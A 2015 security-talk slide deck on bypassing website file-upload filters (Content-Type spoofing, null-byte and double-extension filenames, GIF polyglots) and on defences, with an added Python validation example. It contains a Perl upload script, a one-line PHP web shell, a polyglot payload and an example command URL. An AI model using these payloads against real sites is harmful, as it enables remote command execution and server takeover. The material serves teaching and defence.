BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES
By K. Subramanian, K. R. Mukesh
Jun 08, 2015
File upload
• Necessity: social networking websites, blogs, file sharing, etc.
• Web developers do not consider the threats
• Files should be sanitized
• If not, leads to local file inclusion and hacking
• Filtering mechanisms
Methods of filtering
Content-Type verification
• HTTP POST – MIME type declared in the multipart body:
Content-Disposition: form-data; name="uploaded file []"; filename="18.jpg"\r\n
Content-Type: image/jpeg\r\n\r\n
<file content>
• To bypass this filter, edit the Content-Type to an applicable one.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new;
# Multipart upload whose declared Content-Type does not match the file
my $res = $ua->request(POST 'http://example.com/upload.php',
    Content_Type => 'form-data',
    Content      => [
        userfile => ['sh.php', 'sh.php', 'Content-Type' => 'application/pdf'],
    ],
);
print $res->as_string();
An easy way – Tamper data
• Tamper Data – Mozilla add-on that allows modifying the POST data before it is submitted
Filename extension verification
• Check the extension of the file
• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in the filename: sh.php%00.pdf
(or) sh.asp;xx.pdf
• While uploading, the extension is .pdf
• When accessed, delivered to the PHP interpreter
File content verification
• Applicable to image files
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with embedded PHP code
Content-Type: image/gif
GIF89a(...some binary data...)<?php system($_GET['command']); ?>(...binary data...)
• The PHP interpreter executes the PHP code inside a garbage of binary values
A Simple Demonstration
Towards Bypassing these Filters
Worst case scenario
• Local file inclusion – PHP shell upload
• Simple PHP shell:
<?php system($_GET['command']); ?>
• Executes commands on the remote server: www.example.com/uploads/sh.php?command=ifconfig
• Entire control of the server – rooting it
• Defacements, database access, credential information theft, etc.
Security Measures
• Preventing direct access to the uploaded files:
$uploaddir = '/var/spool/uploads/'; # Outside of the web root
• Block web access using an .htaccess file: IndexIgnore */* (note that IndexIgnore only hides the files from directory listings; it does not deny a request for a file by name)
• Overhead to read and write
• Sometimes leads to potential directory traversal attacks
Random file name implementation
• Prevents the attacker from knowing the name of the uploaded file
• Map the names in the database:
$res = $db->query("INSERT INTO uploads SET name=?, original_name=?");
• Query while reading
• A little overhead, but secure
• Think again: leads to SQL injection if the user-supplied original name is concatenated into the query instead of bound as a parameter
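The defensive side of the slides above as one piece, written as an added example in Python rather than the deck's PHP (not the authors' code): an extension allow-list that rejects the null-byte and double-extension names, a magic-byte check instead of trusting the client's Content-Type, a random stored name, and the name mapping inserted with bound parameters. UPLOAD_DIR and the sqlite table are constructed for the example.

```python
import os
import re
import secrets
import sqlite3
import tempfile

# Allow-list: extension -> magic bytes the file must start with (trust bytes, not Content-Type).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
# Exactly one extension; no null bytes, ';', '%' or path separators, so sh.php%00.pdf and sh.asp;xx.pdf fail.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Storage directory outside the web root; falls back to a temp dir so the example runs anywhere.
UPLOAD_DIR = os.environ.get("UPLOAD_DIR") or tempfile.mkdtemp()


def validate_upload(filename: str, data: bytes) -> str:
    """Return the allow-listed extension, or raise ValueError."""
    m = SAFE_NAME.match(filename)
    ext = m.group(1).lower() if m else ""
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    # Defence in depth against the GIF89a + <?php polyglot described in the deck.
    if PHP_TAG.search(data):
        raise ValueError("embedded PHP open tag")
    return ext


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE uploads (name TEXT PRIMARY KEY, original_name TEXT)")
    return db


def store_upload(db: sqlite3.Connection, filename: str, data: bytes) -> str:
    """Validate, write under an unguessable name and record the mapping with bound parameters."""
    ext = validate_upload(filename, data)
    stored = f"{secrets.token_hex(16)}.{ext}"
    with open(os.path.join(UPLOAD_DIR, stored), "wb") as fh:
        fh.write(data)
    # The user-controlled original name is bound, never concatenated into the SQL text.
    db.execute("INSERT INTO uploads (name, original_name) VALUES (?, ?)", (stored, filename))
    db.commit()
    return stored
```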
Conclusion
• Complicated to implement a secure file upload facility
• Many filters = slow response; leads to Denial of Service (DoS) attacks
• Best way is to maintain UPLOAD LOGS containing user info such as IP address, helpful to trace an attacker
• Secure coding practices
Thank you